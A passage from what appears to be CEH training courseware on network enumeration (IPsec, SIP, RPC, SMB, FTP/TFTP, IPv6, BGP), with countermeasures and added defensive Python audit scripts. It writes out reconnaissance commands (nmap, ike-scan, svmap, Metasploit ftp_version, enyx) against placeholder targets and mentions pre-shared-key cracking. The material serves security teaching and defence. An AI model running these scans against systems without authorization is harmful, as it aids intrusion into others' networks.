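if __name__ == "__main__":
    for owner, types in walk_nsec(SAMPLE_NSEC, "example.com."):
        print(owner, " ".join(types))
```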
▪ LDNS
Source: https://www.nlnetlabs.nl
ldns-walk enumerates the DNSSEC zone and obtains results on the DNS record files.
Figure 4.28: Screenshot of LDNS displaying results on the target domain
▪ DNSRecon
Source: https://www.github.com
DNSRecon is a zone enumeration tool that assists users in enumerating DNS records such as A, AAAA, and CNAME. It also performs NSEC zone enumeration to obtain DNS record files of a target domain.
Figure 4.29: Screenshot of DNSRecon displaying results on the target domain
IPsec Enumeration
IPsec is the most commonly implemented technology for both gateway-to-gateway (LAN-to-LAN) and host-to-gateway (remote access) enterprise VPN solutions. IPsec provides data security by employing various components such as Encapsulating Security Payload (ESP), Authentication Header (AH), and Internet Key Exchange (IKE) to secure communication between VPN endpoints. Most IPsec-based VPNs use the Internet Security Association and Key Management Protocol (ISAKMP), a part of IKE, to establish, negotiate, modify, and delete Security Associations (SA) and cryptographic keys in a VPN environment. Attackers can perform simple direct scanning for ISAKMP at UDP port 500 with tools such as Nmap to acquire information related to the presence of a VPN gateway.
The following Nmap command can be used to perform an Nmap scan for checking the status of ISAKMP over port 500:
# nmap -sU -p 500 <target IP address>
Figure 4.30: Screenshot displaying an Nmap scan over port 500 for ISAKMP
Attackers can probe further using fingerprinting tools such as ike-scan to enumerate sensitive information, including the encryption and hashing algorithm, authentication type, key distribution algorithm, and SA Life Duration. In this type of scan, specially crafted IKE packets with an ISAKMP header are sent to the target gateway, and the responses are recorded. The following command is used for initial IPsec VPN discovery with the ike-scan tool:
# ike-scan -M <target gateway IP address>
▪ ike-scan
Source: https://github.com
ike-scan discovers IKE hosts and can fingerprint them using the retransmission backoff pattern. ike-scan can perform the following functions.
o Discovery: The hosts running IKE in a given IP range can be determined by displaying the hosts that respond to the IKE requests sent by ike-scan.
o Fingerprinting: The IKE implementation used by the hosts can be determined, and in some cases, the version of the software they are running can be determined. This is done in two ways: UDP backoff fingerprinting, which involves recording the times of arrival of the IKE response packets from the target hosts and comparing the observed retransmission backoff pattern against known patterns, and Vendor ID fingerprinting, which compares Vendor ID payloads from the VPN servers against known Vendor ID patterns.
o Transform enumeration: The transform attributes supported by the VPN server for IKE phase 1 (e.g., encryption algorithm and hash algorithm) can be determined.
o User enumeration: For some VPN systems, valid VPN usernames can be discovered.
o Pre-shared key cracking: Offline dictionary or brute-force password cracking can be performed for IKE Aggressive Mode with pre-shared key authentication. This uses ike-scan to obtain the hash and other parameters as well as psk-crack, which is a part of the ike-scan package, to perform the cracking.
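Added example (not the courseware's): the 28-byte ISAKMP header that every IKEv1 packet on UDP port 500 starts with, and a check that flags Aggressive Mode (exchange type 4), the mode whose first exchange exposes the material that the pre-shared key cracking above depends on, so that a gateway owner can confirm it is disabled; the datagrams are constructed headers, not a capture.

```python
"""Added example (not from the CEH courseware): parsing the ISAKMP header
(RFC 2408 section 3.1) seen on UDP 500 and flagging IKEv1 Aggressive Mode
(exchange type 4); Main Mode (type 2) keeps identities and the PSK-derived
hash behind the Diffie-Hellman exchange. Datagrams below are constructed.
"""
import struct
from typing import Dict, List

EXCHANGE = {0: "NONE", 1: "Base", 2: "Identity Protection (Main Mode)",
            3: "Authentication Only", 4: "Aggressive", 5: "Informational"}
HEADER = struct.Struct("!8s8sBBBBII")   # 28 bytes
FLAG_ENCRYPTION = 0x01


def isakmp_header(i_cookie: bytes, exchange_type: int, next_payload: int = 1,
                  r_cookie: bytes = bytes(8), flags: int = 0, msg_id: int = 0,
                  length: int = 28) -> bytes:
    """Build a header; version byte 0x10 = ISAKMP major 1, minor 0 (IKEv1)."""
    return HEADER.pack(i_cookie, r_cookie, next_payload, 0x10, exchange_type,
                       flags, msg_id, length)


def parse_isakmp(pkt: bytes) -> Dict:
    if len(pkt) < HEADER.size:
        raise ValueError("short ISAKMP header")
    icookie, rcookie, _np, ver, xchg, flags, _msg_id, length = HEADER.unpack_from(pkt)
    if length < HEADER.size:
        raise ValueError("length field smaller than header")
    return {"initiator_spi": icookie.hex(), "responder_spi": rcookie.hex(),
            "version": f"{ver >> 4}.{ver & 0xF}",
            "exchange": EXCHANGE.get(xchg, f"type {xchg}"), "exchange_type": xchg,
            "encrypted": bool(flags & FLAG_ENCRYPTION),
            # A zero responder cookie marks the initiator's first message.
            "first_message": rcookie == bytes(8), "length": length}


def flag_aggressive_mode(datagrams: List[bytes]) -> List[str]:
    """Report initiators that open Aggressive Mode; a gateway configured for
    Main Mode only should never complete such an exchange."""
    out = []
    for pkt in datagrams:
        h = parse_isakmp(pkt)
        if h["exchange_type"] == 4 and h["first_message"]:
            out.append(f"aggressive mode proposal from SPI {h['initiator_spi']}")
    return out


if __name__ == "__main__":
    sample = [isakmp_header(b"\x01" * 8, 2), isakmp_header(b"\xab" * 8, 4)]
    print(flag_aggressive_mode(sample))
```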
VoIP Enumeration
VoIP is an advanced technology that has replaced the conventional public switched telephone network (PSTN) in both corporate and home environments. VoIP uses internet infrastructure to establish connections for voice calls; data are also transmitted on the same network. However, VoIP is vulnerable to TCP/IP
o Scan one host on different ports for an SIP service on that host or multiple hosts on multiple ports
o Ring all the phones on a network simultaneously using the INVITE method
The below screenshot shows an example of the enumeration of SIP device details using the Svmap tool through the following command:
# svmap <target network range>
Figure 4.32: Screenshot displaying Svmap scan for enumerating SIP details
Attackers use Metasploit's SIP Username Enumerator scan to enumerate numeric usernames/extensions of VoIP phones. The below screenshot shows an example of enumerating SIP using Metasploit.
Figure 4.33: Screenshot displaying Metasploit exploit for SIP enumeration
RPC Enumeration
The remote procedure call (RPC) is a technology used for creating distributed client/server programs. RPC allows clients and servers to communicate in distributed client/server programs. It is an inter-process communication mechanism, which enables data exchange between different processes. In general, RPC consists of components such as a client, a server, an endpoint, an endpoint mapper, a client stub, and a server stub, along with various dependencies. The portmapper service listens on TCP and UDP port 111 to detect the endpoints and present clients with details of listening RPC services. Enumerating RPC endpoints enables attackers to identify any vulnerable services on these service ports. In networks protected by firewalls and other security establishments, this portmapper is often filtered. Therefore, attackers scan wide port ranges to identify RPC services that are open to direct attack.
Attackers use the following Nmap scan commands to identify the RPC service running on the network:
# nmap -sR <target IP/network>
# nmap -T4 -A <target IP/network>
Figure 4.34: Screenshot displaying an Nmap scan result for RPC enumeration
Additionally, attackers use tools such as NetScanTools Pro for RPC enumeration.
Figure 4.35: Screenshot displaying NetScanTools Pro for RPC enumeration
Unix/Linux User Enumeration
One of the important steps for enumeration is to perform Unix/Linux user enumeration. Unix/Linux user enumeration provides a list of users along with details such as the username, host name, and start date and time of each session. The following command-line utilities can be used to perform Unix/Linux user enumeration.
- rusers
  rusers displays a list of users who are logged in to remote machines or machines on the local network. It displays an output similar to the who command, but for the hosts/systems on the local network. Its syntax is as follows:
  /usr/bin/rusers [-a] [-l] [-u | -h | -i] [Host ...]
  The options are as follows.
  -a: Gives a report for a machine even if no users are logged in
  -l: Gives a longer listing similar to the who command
  -h: Sorts alphabetically by host name
  -i: Sorts by idle time
  -u: Sorts by the number of users
- rwho
  rwho displays a list of users who are logged in to hosts on the local network. Its output is similar to that of the who command and contains information about the username, host name, and start date and time of each session for all machines on the local network running the rwho daemon. Its syntax is as follows:
  rwho [-a]
  It has the following option.
  -a: Includes all users; without this flag, users whose sessions are idle for an hour or more are not included in the report
- finger
  finger displays information about system login users such as the user's name, real name, terminal name, idle time, login time, office location, and office phone numbers. Its syntax is as follows:
  finger [-l] [-m] [-p] [-s] [user ...] [user@host ...]
  The options are as follows.
  -s: Displays the user's login name, real name, terminal name, idle time, login time, office location, and office phone number
  -l: Produces a multi-line format displaying all the information described for the -s option as well as the user's home directory, home phone number, login shell, mail status, and the contents of the files ".plan," ".project," ".pgpkey," and ".forward" from the user's home directory
Figure 4.36: Screenshot displaying the execution of the finger command for user enumeration
Telnet and SMB Enumeration
Telnet Enumeration
Telnet is a network terminal protocol that allows users to access remote computers or servers over the Internet. This protocol provides two-way interactive communication for computers on LANs and the Internet. Depending on the privileges assigned to the users, they can login to the remote system to access specific files, services, data, etc.
As shown in the screenshot, the following Nmap command is used by attackers to enumerate the Telnet service running on the target system:
# nmap -p 23 <target domain>
Figure 4.37: Screenshot displaying a Nmap Telnet enumeration result (the annotation indicates that port 23 is blocked by a firewall or some other network obstacle)
SMB Enumeration
As shown in the screenshot, attackers can further use the following Nmap command to enumerate the SMB service running on the target IP address:
# nmap -p 445 -A <target IP>
In the above command, the option -p specifies a port to scan (445 in this case), and option -A is used for OS detection, version detection, script scanning, and traceroute information.
Figure 4.38: Screenshot of Nmap performing SMB enumeration (annotations: open port 445 and SMB details)
FTP and TFTP Enumeration
FTP Enumeration
The File Transfer Protocol (FTP) is used to transfer files over TCP, and its default port is 21. In FTP, data are transferred between a sender and receiver in plaintext, exposing critical information such as usernames and passwords to attackers. FTP offers neither a secure network environment nor secure user authentication. Individuals do not need authentication to access an FTP server in a network. This provides an easy method for attackers to access network resources.
The implementation of FTP in an organization's network makes the data accessible to external sources. Attackers can scan and enumerate open port 21 running FTP services and further use this information to launch various attacks such as FTP bounce, FTP brute force, and packet sniffing.
As shown in the screenshot, the following Nmap command is used by the attackers to enumerate the FTP service running on the target domain:
Figure 4.39: Screenshot of Nmap displaying an FTP enumeration result (the annotation indicates that port 21 is blocked by a firewall or some other network obstacle)
Attackers also use Metasploit to enumerate FTP services running on remote hosts. The following commands can be used to detect the FTP version of the target server:
msf > use auxiliary/scanner/ftp/ftp_version
msf auxiliary(scanner/ftp/ftp_version) > set RHOSTS <target IP>
msf auxiliary(scanner/ftp/ftp_version) > exploit
TFTP Enumeration
The Trivial File Transfer Protocol (TFTP) is a simplified version of FTP and is used for transferring files between network devices. By default, TFTP servers listen on UDP port 69. This protocol is used when directory visibility and user authentication are not required; therefore, it provides no security features.
To perform TFTP enumeration, attackers can use tools such as PortQry and Nmap to extract information such as running TFTP services and files stored on a remote server. By using the enumerated information, attackers can further gain unauthorized access to the target system, steal important files, and upload malicious scripts to launch further attacks. Furthermore, this information enables attackers to perform various attacks such as DNS amplification attacks, TFTP reflection attacks, and DDoS attacks.
PortQry
Source: https://www.microsoft.com
The PortQry utility reports the port status of TCP and UDP ports on a selected target. Attackers can use the PortQry tool to perform TFTP enumeration. This utility reports the port status of target TCP and UDP ports on a local or remote computer. In the PortQry tool, attackers can specify the target to scan for a running TFTP service on open port 69. As shown in the screenshot, the attackers perform TFTP enumeration on the target domain by setting the Ports to query: value to 69 and Protocol to UDP.
Figure 4.40: Screenshot of the PortQry tool displaying a TFTP scan result
Attackers can also use the PortQry command-line utility to perform TFTP enumeration using the following command:
portqry -n <target domain> -e 69 -p udp
Figure 4.41: Screenshot of the PortQry command-line utility showing a TFTP scan result
Nmap
Source: https://nmap.org
Attackers can use the Nmap tool to perform simple direct scanning for TFTP port 69. As shown in the screenshot, the following Nmap command is used by attackers to enumerate the TFTP service running on the target domain:
# nmap -p 69 <target domain>
Figure 4.42: Screenshot of Nmap command displaying a TFTP scan result (the annotation indicates that port 69 is blocked by a firewall or some other network obstacle)
IPv6 Enumeration
Internet Protocol version 6 (IPv6) is an addressing protocol that identifies computer systems, including location information, and assists in routing traffic from one system to another system across a network. It is an advanced version of IPv4 and, therefore, supports a greater number of hosts as compared to IPv4. It was designed to overcome the problem of IPv4 address exhaustion. Attackers perform IPv6 enumeration on target hosts to obtain their IPv6 addresses and further scan the enumerated IP addresses to detect various security problems such as access to routing structure, exposure of sensitive content, and users' access control issues. By using this information, attackers can launch various attacks such as SYN flood attacks, DNS amplification attacks, and DDoS attacks. Attackers can scan and enumerate the IPv6 address of a target machine in the network by using various tools such as Enyx and IPv6 Hackit.
Enyx
Source: https://github.com
Enyx is an enumeration tool that fetches the IPv6 address of a machine through SNMP. As shown in the screenshot, attackers use the following command to enumerate the IPv6 address of a target machine (10.10.10.20) by setting the SNMP version to 2c and the community string to public:
python enyx.py 2c public <target IP>
IPv6 Hackit
Source: http://ipv6hackit.sourceforge.net
Hackit is a scanning tool that provides a list of active IPv6 hosts. It can perform TCP port scanning and identify AAAA IPv6 host records. As shown in the screenshot, attackers can specify the target machine and run a scan to enumerate the IPv6 information.
Figure 4.44: Screenshot displaying the IPv6 Hackit tool
BGP Enumeration
The Border Gateway Protocol (BGP) is a routing protocol used to exchange routing and reachability information between different autonomous systems (AS) on the Internet. Because this protocol is used to connect one AS to other ASs, it is also called external BGP (eBGP). BGP finds the shortest path to route traffic from one IP address to another efficiently. BGP creates its TCP session on port 179. Attackers perform BGP enumeration on the target using tools such as Nmap and BGP Toolkit to discover the IPv4 prefixes indicated by the AS number and the routing path followed by the target. Attackers use this information to launch various attacks against the target, such as man-in-the-middle attacks, BGP hijacking attacks, and DoS attacks.
As shown in the screenshot, attackers use the following Nmap command to enumerate BGP running on the target system:
# nmap -p 179 <target IP>
Figure 4.45: Screenshot of Nmap displaying a BGP enumeration result
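The Nmap checks in this and the preceding sections (Telnet 23, SMB 445, FTP 21, TFTP 69, BGP 179) all end in the same per-port states that the screenshot annotations call out. As an added example that is not part of the courseware, the following Python script parses Nmap's normal output and maps each state to its meaning for the enumeration step; the sample output is constructed, not captured from any real host.

```python
"""Classify Nmap per-port results for the enumeration checks above.

Added example, not part of the EC-Council courseware. It parses the
normal output that Nmap prints for a port scan (with or without the
VERSION column that -A / -sV add) and maps each port state to what the
section's screenshots annotate: "filtered" is the "blocked by a firewall
or some other network obstacle" case. The sample output is constructed.
"""
import re
from dataclasses import dataclass
from typing import Dict, List

# Constructed sample covering the ports used in this section:
# 23 Telnet, 445 SMB, 21 FTP, 179 BGP and 69 TFTP. Note that a UDP line
# such as 69/udp only appears when Nmap is run with -sU; "nmap -p 69"
# on its own scans TCP port 69, which is not where TFTP listens.
SAMPLE_NMAP_OUTPUT = """\
Nmap scan report for target.example (10.10.10.20)
Host is up (0.0012s latency).

PORT     STATE         SERVICE      VERSION
21/tcp   filtered      ftp
23/tcp   open          telnet       Linux telnetd
445/tcp  open          microsoft-ds
179/tcp  closed        bgp
69/udp   open|filtered tftp

Nmap done: 1 IP address (1 host up) scanned in 1.23 seconds
"""

# One port line: "<port>/<proto>  <state>  <service>  [version text]"
PORT_LINE = re.compile(
    r"^(?P<port>\d+)/(?P<proto>tcp|udp)\s+"
    r"(?P<state>[a-z|]+)\s+(?P<service>\S+)(?:\s+(?P<version>.+))?$"
)

# What each Nmap state means for the enumeration step
STATE_MEANING = {
    "open": "service reachable and answering",
    "closed": "host reachable but nothing listening on the port",
    "filtered": "blocked by a firewall or some other network obstacle",
    "open|filtered": "no reply (UDP): service may be listening or filtered",
}


@dataclass
class PortResult:
    port: int
    proto: str
    state: str
    service: str
    version: str


def parse_nmap_output(text: str) -> List[PortResult]:
    """Extract the port table rows from Nmap normal output."""
    results: List[PortResult] = []
    for line in text.splitlines():
        m = PORT_LINE.match(line.strip())
        if m is None:
            continue  # header, host banner, blank or "Nmap done" line
        results.append(PortResult(int(m["port"]), m["proto"], m["state"],
                                  m["service"], (m["version"] or "").strip()))
    return results


def interpret(result: PortResult) -> str:
    """Translate an Nmap port state into the screenshot annotations' terms."""
    return STATE_MEANING.get(result.state, "unrecognised state: " + result.state)


def summarize(text: str) -> Dict[str, str]:
    """Map "port/proto" to its interpretation for every port in the output."""
    return {f"{r.port}/{r.proto}": interpret(r) for r in parse_nmap_output(text)}


def reachable_services(text: str) -> List[str]:
    """Services that answered, i.e. what the enumeration actually exposes."""
    return [r.service for r in parse_nmap_output(text) if r.state == "open"]


if __name__ == "__main__":
    for key, meaning in summarize(SAMPLE_NMAP_OUTPUT).items():
        print(f"{key:<10} {meaning}")
```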
As shown in the screenshot, attackers use BGP Toolkit to perform BGP enumeration on the target domain. This online tool can be used to search the target domain and obtain details such as DNS information, website information, IP information, AS information, and whois information. Based on the identified ASs, attackers can further enumerate details such as IPv4 prefixes, BGP graphs, routing, and IPv4 peers.
Figure 4.46: Screenshot of BGP Toolkit
Enumeration Countermeasures
Thus far, we have described enumeration techniques and tools used to extract valuable information from targets. Next, we discuss countermeasures that can prevent attackers from enumerating sensitive information from a network or host. This section focuses on methods to avoid information leakage through SNMP, DNS, SMTP, LDAP, SMB, NFS, and FTP enumeration.
SNMP Enumeration Countermeasures
- Remove the SNMP agent or turn off the SNMP service.
- If turning off SNMP is not an option, then change the default community string names.
- Upgrade to SNMPv3, which encrypts passwords and messages.
- Implement the Group Policy option called "Additional restrictions for anonymous connections."
- Ensure that the access to null session pipes, null session shares, and IPsec filtering is restricted.
- Block access to TCP/UDP port 161.
- Do not install the management and monitoring Windows component unless required.
- Encrypt or authenticate using IPsec.
- Do not misconfigure the SNMP service with read-write authorization.
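The default community strings and read-write authorization named in this list can be checked mechanically on a Net-SNMP host. As an added example that is not EC-Council's code, the following Python script audits the rocommunity/rwcommunity and rouser/rwuser directives of an snmpd.conf; the configuration text is constructed.

```python
"""Audit a Net-SNMP snmpd.conf against the SNMP countermeasures listed above.

Added example, not EC-Council's code. It reads the rocommunity /
rwcommunity / rouser / rwuser directives of Net-SNMP's snmpd.conf and
flags the default community strings (public/private), any read-write
community, communities that accept requests from any source, and SNMPv3
users configured without authentication. The configuration is constructed.
"""
import shlex
from typing import List, Tuple

DEFAULT_COMMUNITIES = {"public", "private"}
COMMUNITY_DIRECTIVES = {"rocommunity", "rwcommunity", "rocommunity6", "rwcommunity6"}
USER_DIRECTIVES = {"rouser", "rwuser"}

# Constructed snmpd.conf with a mix of weak and acceptable settings
SAMPLE_SNMPD_CONF = """\
# constructed sample, not a real host's configuration
agentAddress udp:161
rocommunity public                      # default string, any source
rwcommunity private 10.10.10.0/24       # default string with write access
rocommunity netmon-ro 10.10.10.5        # custom string, single source
rwuser snmpadmin priv                   # SNMPv3, auth + encryption required
rouser legacy noauth                    # SNMPv3 user without authentication
"""

Finding = Tuple[int, str, str]   # (line number, finding id, offending line)


def audit_snmpd_conf(text: str) -> List[Finding]:
    findings: List[Finding] = []
    for lineno, raw in enumerate(text.splitlines(), start=1):
        line = raw.split("#", 1)[0].strip()   # drop comments
        if not line:
            continue
        parts = shlex.split(line)
        directive = parts[0].lower()
        if directive in COMMUNITY_DIRECTIVES and len(parts) >= 2:
            community = parts[1]
            # The optional third field restricts the source address. Nothing,
            # "default", or a view restriction (-V) means any host may use it.
            source = "default"
            if len(parts) >= 3 and not parts[2].startswith("-V"):
                source = parts[2]
            if community.lower() in DEFAULT_COMMUNITIES:
                findings.append((lineno, "default-community-string", line))
            if directive.startswith("rw"):
                findings.append((lineno, "read-write-community", line))
            if source.lower() == "default":
                findings.append((lineno, "community-open-to-any-source", line))
        elif directive in USER_DIRECTIVES and len(parts) >= 3:
            # rouser/rwuser USER [noauth|auth|priv]: noauth gives up the
            # authentication that is the reason for moving to SNMPv3.
            if parts[2].lower() == "noauth":
                findings.append((lineno, "snmpv3-user-without-auth", line))
    return findings


def finding_ids(text: str) -> List[str]:
    """Just the finding identifiers, in file order."""
    return [f[1] for f in audit_snmpd_conf(text)]


if __name__ == "__main__":
    for lineno, fid, line in audit_snmpd_conf(SAMPLE_SNMPD_CONF):
        print(f"line {lineno}: {fid}: {line}")
```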
DNS Enumeration Countermeasures
- Disable DNS zone transfers to untrusted hosts.
- Ensure that the private hosts and their IP addresses are not published in the DNS zone files of the public DNS server.
- Use premium DNS registration services that hide sensitive information such as host information (HINFO) from the public.
- Use standard network admin contacts for DNS registrations to avoid social engineering attacks.
- Prune DNS zone files to prevent revealing unnecessary information.
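Two of these countermeasures (keep private hosts out of the public zone, hide HINFO) can be checked against the zone file itself. As an added example that is not EC-Council's code, the following Python script parses BIND-style zone records and flags the leaks; the zone content is constructed.

```python
"""Check a public DNS zone file for the leaks the DNS countermeasures above describe.

Added example, not EC-Council's code. It parses BIND-style zone records
(name [TTL] [IN] TYPE rdata) and flags A/AAAA records that publish
private (RFC 1918, IPv6 unique-local or link-local) addresses of internal
hosts, and HINFO records that reveal hardware and OS details. The zone is
constructed.
"""
import ipaddress
import shlex
from typing import List, Tuple

Record = Tuple[str, str, List[str]]    # (owner name, type, rdata tokens)
Finding = Tuple[str, str, str]         # (owner name, type, issue)

PRIVATE_NETS = [ipaddress.ip_network(n) for n in (
    "10.0.0.0/8", "172.16.0.0/12", "192.168.0.0/16",   # RFC 1918
    "fc00::/7",                                        # IPv6 unique local
    "fe80::/10",                                       # IPv6 link-local
)]

# Constructed zone for a public name server; 203.0.113.0/24 is documentation space
SAMPLE_ZONE = """\
$ORIGIN example.com.
@         3600 IN SOA   ns1.example.com. hostmaster.example.com. (2020010101 3600 900 604800 86400)
@         3600 IN NS    ns1.example.com.
www       3600 IN A     203.0.113.10
ns1       3600 IN A     203.0.113.2
intranet  3600 IN A     10.10.10.20        ; internal host leaked into the public zone
db01       300 IN A     192.168.1.50
www       3600 IN HINFO "Intel x86" "Ubuntu 18.04"
"""


def parse_zone(text: str) -> List[Record]:
    records: List[Record] = []
    for raw in text.splitlines():
        line = raw.split(";", 1)[0].strip()       # strip comments
        if not line or line.startswith("$"):      # skip $ORIGIN/$TTL directives
            continue
        tokens = shlex.split(line)                # keeps quoted HINFO strings intact
        name, rest = tokens[0], tokens[1:]
        if rest and rest[0].isdigit():            # optional TTL
            rest = rest[1:]
        if rest and rest[0].upper() == "IN":      # optional class
            rest = rest[1:]
        if rest:
            records.append((name, rest[0].upper(), rest[1:]))
    return records


def is_private_address(value: str) -> bool:
    """True for addresses in the private ranges listed above."""
    try:
        addr = ipaddress.ip_address(value)
    except ValueError:
        return False
    return any(addr in net for net in PRIVATE_NETS)


def audit_zone(text: str) -> List[Finding]:
    findings: List[Finding] = []
    for name, rtype, rdata in parse_zone(text):
        if rtype in ("A", "AAAA") and rdata and is_private_address(rdata[0]):
            findings.append((name, rtype, "private address published: " + rdata[0]))
        elif rtype == "HINFO":
            findings.append((name, rtype, "HINFO reveals host details: " + " ".join(rdata)))
    return findings


if __name__ == "__main__":
    for name, rtype, issue in audit_zone(SAMPLE_ZONE):
        print(f"{name:<10} {rtype:<6} {issue}")
```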
SMTP Enumeration Countermeasures
SMTP servers should be configured in the following manner.
- Ignore email messages to unknown recipients.
- Exclude sensitive information on mail servers and local hosts in mail responses.
- Disable the open relay feature.
- Limit the number of accepted connections from a source to prevent brute-force attacks.
- Disable EXPN, VRFY, and RCPT TO commands or restrict them to authentic users.
- Ignore emails to unknown recipients by configuring SMTP servers.
LDAP Enumeration Countermeasures
- By default, LDAP traffic is transmitted unsecured; therefore, use Secure Sockets Layer (SSL) technology or STARTTLS to encrypt the traffic.
- Select a username different from the email address and enable account lockout.
- Restrict access to Active Directory by using software such as Citrix.
- Use NTLM or any basic authentication mechanism to limit access to legitimate users.
SMB Enumeration Countermeasures
Common sharing services or other unused services may provide doorways for attackers to break into a network's security. A network running SMB is at a high risk of enumeration. Since web and DNS servers do not require this protocol, it is advisable to disable it on them. The SMB protocol can be disabled by disabling the properties Client for Microsoft Networks and File and Printer Sharing for Microsoft Networks in Network and Dial-up Connections. On servers that are accessible from the Internet, also known as bastion hosts, SMB can be disabled by disabling the same two properties of the TCP/IP properties dialog box. Another method of disabling the SMB protocol on bastion hosts, without explicitly disabling it, is by blocking the ports used by the SMB service. These are TCP ports 139 and 445.
Because disabling SMB services is not always a feasible option, other countermeasures against SMB enumeration may be required. Windows Registry can be configured to limit anonymous access from the Internet to a specified set of files. These files and folders are specified in the settings Network access: Named pipes that can be accessed anonymously and Network access: Shares that can be accessed anonymously. This configuration involves adding the RestrictNullSessAccess parameter to the registry key:
HKEY_LOCAL_MACHINE\SYSTEM\CurrentControlSet\Services\LanmanSe
The RestrictNullSessAccess parameter takes binary values, with 1 denoting enabled and 0 denoting disabled. Setting this parameter to 1 or enabled restricts the access of anonymous users to the files specified in the Network access settings.
The following are additional countermeasures for defending against SMB enumeration.
- Ensure that Windows Firewall or similar endpoint protection systems are enabled on the system.
- Install the latest security patches for Windows and third-party software.
- Implement a proper authentication mechanism with a strong password policy.
- Implement strong permissions to keep the stored information safe.
- Perform a regular audit of system logs.
- Perform active system monitoring to monitor the systems for any malicious incident.
NFS Enumeration Countermeasures
- Implement proper permissions (read/write must be restricted to specific users) in exported file systems.
- Implement firewall rules to block NFS port 2049.
- Ensure the proper configuration of files such as /etc/smb.conf, /etc/exports, and /etc/hosts.allow to protect the data stored in the server.
- Log the requests to access the system files on the NFS server.
- Keep the root_squash option in the /etc/exports file turned ON so that no requests made as root on the client are trusted.
- Implement NFS tunneling through SSH to encrypt the NFS traffic over the network.
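The permission and root_squash points above can be verified directly in /etc/exports. As an added example that is not EC-Council's code, the following Python script parses export entries and flags world exports, world-writable exports and no_root_squash, including the "host (options)" spacing mistake that exportfs treats as an export to everyone; the file content is constructed.

```python
"""Audit /etc/exports against the NFS countermeasures listed above.

Added example, not EC-Council's code. It parses Linux /etc/exports
entries (path followed by client(options) pairs) and flags exports open
to every client, read-write exports to every client, and exports where
no_root_squash disables the root_squash protection. It also catches the
classic "host (options)" mistake: the space before the parenthesis makes
the options apply to a wildcard client, so the path is exported to the
world. The file content is constructed.
"""
import re
from typing import List, Set, Tuple

Export = Tuple[str, str, Set[str]]      # (path, client, options)
Finding = Tuple[str, str, str]          # (path, client, issue)

SAMPLE_EXPORTS = """\
# constructed /etc/exports
/srv/share    10.10.10.0/24(rw,sync,root_squash)
/srv/backups  *(rw,no_root_squash)
/srv/public   10.10.10.0/24 (rw)
/home         10.10.10.5(rw,sync)
"""

# One client token: "<host>" or "<host>(<opts>)"; host may be empty before "("
CLIENT_TOKEN = re.compile(r"^(?P<host>[^(\s]*)(?:\((?P<opts>[^)]*)\))?$")


def parse_exports(text: str) -> List[Export]:
    exports: List[Export] = []
    for raw in text.splitlines():
        line = raw.split("#", 1)[0].strip()
        if not line:
            continue
        path, *client_tokens = line.split()
        for token in client_tokens:
            m = CLIENT_TOKEN.match(token)
            if m is None:
                continue
            # An empty host before "(" means the options apply to everyone,
            # which is how exportfs interprets "host (rw)".
            host = m["host"] or "*"
            opts = {o.strip() for o in (m["opts"] or "").split(",") if o.strip()}
            exports.append((path, host, opts))
    return exports


def audit_exports(text: str) -> List[Finding]:
    findings: List[Finding] = []
    for path, host, opts in parse_exports(text):
        world = host == "*"
        if world:
            findings.append((path, host, "exported to every client"))
        if world and "rw" in opts:
            findings.append((path, host, "world-writable export"))
        if "no_root_squash" in opts:
            findings.append((path, host, "root_squash disabled (client root is trusted)"))
    return findings


if __name__ == "__main__":
    for path, host, issue in audit_exports(SAMPLE_EXPORTS):
        print(f"{path:<14} {host:<16} {issue}")
```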
FTP Enumeration Countermeasures
- Implement secure FTP (SFTP, which uses SSH) or secure FTP (FTPS, which uses SSL) to encrypt the FTP traffic over the network.
- Implement strong passwords or a certification-based authentication policy.
- Ensure that the unrestricted uploading of files on the FTP server is not allowed.
- Disable anonymous FTP accounts. If this is not possible, monitor anonymous FTP accounts regularly.
Module Summary
In this module, we discussed the enumeration concepts along with the techniques, services, and ports used for enumeration. We have also discussed how attackers perform different enumeration techniques (NetBIOS, SNMP, LDAP, NTP, NFS, SMTP, DNS, IPsec, VoIP, RPC, Linux/Unix, Telnet, FTP, TFTP, SMB, IPv6, and BGP enumeration) to gather information about the target. This module ended with a detailed discussion on the countermeasures that organizations can adopt to defend against enumeration activities.
In the next module, we will discuss in detail how attackers, as well as ethical hackers and pen testers, perform vulnerability analysis to identify security loopholes in the target organization's network, communication infrastructure, and end systems.
Certified Ethical Hacker
Module 05: Vulnerability Analysis
Module Objectives
In today's world, organizations depend heavily on information technology for protecting vital information. This information is associated with areas of finance, research and development, personnel, legality, and security. Vulnerability assessments scan networks for known security weaknesses. Attackers perform vulnerability analysis to identify security loopholes in the target organization's network, communication infrastructure, and end systems. The identified vulnerabilities are used by attackers to further exploit that target network.
Vulnerability assessment plays a major role in providing security to any organization's resources and infrastructure from various internal and external threats. To secure a network, an administrator needs to perform patch management, install proper antivirus software, check configurations, solve known issues in third-party applications, and troubleshoot hardware with default configurations. All these activities together constitute a vulnerability assessment.
This module starts with an introduction to vulnerability assessment concepts. It also discusses the various vulnerability scoring systems, vulnerability databases, vulnerability management life cycle, and various approaches and tools used to perform vulnerability assessments. This module will provide knowledge about the tools and techniques used by attackers to perform a quality vulnerability analysis. It concludes with an analysis of the vulnerability assessment reports that help an ethical hacker to fix the identified vulnerabilities.
At the end of this module, you will be able to:
- Understand vulnerability research, vulnerability assessment, and vulnerability scoring systems
- Describe the vulnerability management life cycle (vulnerability assessment phases)
- Understand various types of vulnerabilities and vulnerability assessment techniques
- Understand different approaches to vulnerability assessment solutions
- Describe different characteristics of good vulnerability assessment solutions
Vulnerability Assessment Concepts
There are generally two main causes for vulnerable systems in a network, software or hardware misconfiguration and poor programming practices. Attackers exploit these vulnerabilities to perform various types of attacks on organizational resources. This section gives an overview of vulnerability assessment, vulnerability scoring systems, vulnerability databases, and the vulnerability assessment life cycle.
Vulnerability Research
Vulnerability research is the process of analyzing protocols, services, and configurations to discover the vulnerabilities and design flaws that will expose an operating system and its applications to exploit, attack, or misuse.
An administrator needs vulnerability research:
- To gather information about security trends, newly discovered threats, attack surfaces, attack vectors and techniques
- To find weaknesses in the OS and applications and alert the network administrator before a network attack
- To understand information that helps prevent security problems
- To know how to recover from a network attack
An ethical hacker needs to keep up with the most recently discovered vulnerabilities and exploits to stay one step ahead of attackers through vulnerability research, which includes:
- Discovering the system design faults and weaknesses that might allow attackers to compromise a system
- Staying updated about new products and technologies and reading news related to current exploits
- Checking underground hacking web sites (Deep and Dark web sites) for newly discovered vulnerabilities and exploits
- Checking newly released alerts regarding relevant innovations and product improvements for security systems
Security experts and vulnerability scanners classify vulnerabilities by:
- Severity level (low, medium, or high)
- Exploit range (local or remote)
Ethical hackers need to conduct intense research with the help of information acquired in the footprinting and scanning phases to find vulnerabilities.
